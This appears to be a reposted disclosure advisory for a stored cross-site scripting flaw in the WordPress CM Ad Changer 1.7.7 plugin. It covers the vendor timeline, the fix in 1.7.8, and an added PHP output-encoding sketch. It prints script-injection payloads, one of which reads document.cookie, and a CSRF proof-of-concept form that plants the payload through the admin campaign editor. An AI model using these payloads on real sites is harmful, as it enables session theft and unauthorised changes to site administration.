
WordPress CM Ad Changer 1.7.7 Cross Site Scripting

Posted on 13 June 2016

#Exploit Title: CM Ad Changer Plugin XSS
#Date: 9/6/2016
#Exploit Author: Aaditya Purani
#Author Homepage: https://aadityapurani.com
#Vendor Homepage: https://ad-changer.cminds.com
#Software Link: https://downloads.wordpress.org/plugins/cm-ad-changer.zip (Updated)
#Version: 1.7.7
#Tested on: Wordpress 4.5.2
#Category: Web applications

Description:

A Stored Cross Site Scripting was reported by me to CM Ad Plugins, under which an unprivileged user can trigger a Stored XSS to perform malicious actions, or any attacker could send a crafted link which can trigger the Stored XSS.

Steps to Produce:

1) Go to CM Ad changers -> Campaigns

2) Create a Campaign. Enter whatever you want in Campaign settings; in the next tab, "Campaign Banners", select an image in Campaign images and in Banner Title enter this payload:

    </script><script>confirm(/aaditya/)</script>
    </script><script>confirm(document.cookie)</script>

3) Click Save; the payload triggers every time you return.

Attacker can make a payload file containing the following:

<html>
  <body>
    <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}" method="POST">
      <input type="hidden" name="campaign_id" value="1" />
      <input type="hidden" name="title" value="Hacked by Aaditya" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="link" value="" />
      <input type="hidden" name="status" value="on" />
      <input type="hidden" name="banner_display_method" value="selected" />
      <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
      <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
      <input type="hidden" name="banner_title_tag[]" value="" />
      <input type="hidden" name="banner_tag[]" value="" />
      <input type="hidden" name="banner_link[]" value="" />
      <input type="hidden" name="banner_weight[]" value="0" />
      <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

This will trigger the Stored XSS at the banner_title parameter.

It has been fixed, and version 1.7.8 was released on 9th June. Visit here: https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes

---------Timeline----------

1st June: Reported to Vendor Creative Minds
3rd June: Additional Information provided
6th June: Team was able to reproduce
7th June: Fix and confirmed by me
9th June: Publicly Fix released & Changelog updated 1.7.8

Regards,
Aaditya Purani
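
Added example (not part of the original advisory and not the plugin's code): a stand-alone PHP sketch of context-aware output encoding for a stored banner title, run against the payload above. It assumes, from the payload's leading </script>, that the title is echoed inside an inline script block; the vulnerable pattern and all function names are hypothetical.

```php
<?php
// Added example, not the plugin's code; all function names are hypothetical.

// Payload from the advisory, as it would sit in the stored banner title.
$storedTitle = '</script><script>confirm(/aaditya/)</script>';

// ASSUMED vulnerable pattern: the stored title is concatenated into an
// inline script block without any encoding.
function renderBannerJsUnsafe(string $title): string
{
    return "<script>var bannerTitle = '" . $title . "';</script>";
}

// JavaScript context: JSON-encode with the HEX flags so <, >, &, ' and "
// are emitted as \uXXXX escapes and no tag can appear inside the literal.
function renderBannerJsSafe(string $title): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return '<script>var bannerTitle = ' . json_encode($title, $flags) . ';</script>';
}

// HTML attribute context (the edit form re-displaying the saved title).
function renderBannerFieldSafe(string $title): string
{
    $value = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="banner_title[]" value="' . $value . '" />';
}

// Rough check: counts literal "<script" occurrences in the rendered markup.
function scriptTagCount(string $html): int
{
    return preg_match_all('/<script\b/i', $html);
}

$outputs = [
    'js unsafe'  => renderBannerJsUnsafe($storedTitle),
    'js safe'    => renderBannerJsSafe($storedTitle),
    'field safe' => renderBannerFieldSafe($storedTitle),
];
foreach ($outputs as $label => $html) {
    printf("%-10s script tags: %d\n%s\n\n", $label, scriptTagCount($html), $html);
}
```

Inside WordPress, the core helpers esc_attr() and wp_json_encode() cover the same two contexts.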

 
